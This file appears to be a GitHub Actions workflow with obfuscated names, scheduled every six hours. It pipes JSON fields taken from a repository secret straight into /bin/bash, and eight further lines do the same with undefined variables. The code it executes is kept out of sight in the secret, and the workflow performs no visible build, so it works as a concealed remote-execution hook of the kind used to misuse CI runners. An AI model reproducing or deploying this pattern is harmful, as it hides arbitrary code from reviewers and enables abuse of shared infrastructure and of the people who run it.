name: zhengcunzai3456

on:
  workflow_dispatch:
  schedule:
    - cron: '36 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhengcunzai3456
        env:
          kkf03558: ${{ secrets.kkf03558 }}
        run: |
          echo $kkf03558 | jq -r .pczig6 | /bin/bash
          echo $rjef1027 | jq -r .gi55281 | /bin/bash
          echo $lyvcb65 | jq -r .o8209 | /bin/bash
          echo $u0 | jq -r .sgpfe4 | /bin/bash
          echo $qbd90 | jq -r .sn81 | /bin/bash
          echo $br84 | jq -r .ekoo135 | /bin/bash
          echo $qrx9271 | jq -r .aic19 | /bin/bash
          echo $ploa44094 | jq -r .omfc82 | /bin/bash
          echo $z19 | jq -r .ixzw634 | /bin/bash

